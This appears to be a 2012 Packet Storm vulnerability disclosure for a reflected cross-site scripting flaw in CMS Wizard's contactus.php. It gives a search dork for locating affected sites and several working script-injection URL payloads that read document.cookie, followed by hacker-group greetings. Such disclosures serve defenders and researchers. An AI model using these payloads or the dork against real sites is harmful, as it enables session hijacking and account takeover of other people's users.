CMS Wizard suffers from a cross site scripting vulnerability.
a2fe2694ae0368ca2afcbeead1b7dc7c=================================================================
-=CMS wizard Cross Site Scripting
=================================================================
##########################################################
## Author: XaDaL
## Date: 14-02-2012
## vendor: http://www.cmswizard.co.uk/
## tested on: windows mobile
## dork : powered by CMS wizard
##########################################################
This vulnerability affects /contactus.php.
##The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into
a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating
the user. It is also possible to modify the content of the page presented to the user.
##Attack details
URI was set to "><script>alert(document.cookie)</script>
or
"><script>alert(/XaDaL_GantenG/)</script>
or other
##=XSS=
http://localhost/contactus.php/"><script>alert(document.cookie)</script>
http://localhost/contactus.php/"><script>alert(/XaDaL_GantenG/)</script>
!#GREETZ:
kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ
xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. dan semua yang gak bisa aku sebutin satu-satu (o,0)v
all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.
and aya i love you full :*
#Bogel & dicka cyber: kapan-kapan ngopi bareng lagi gan =))
# Happy fvcklentine...
umbar-umbar titit hhhhhhhhhh :p
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!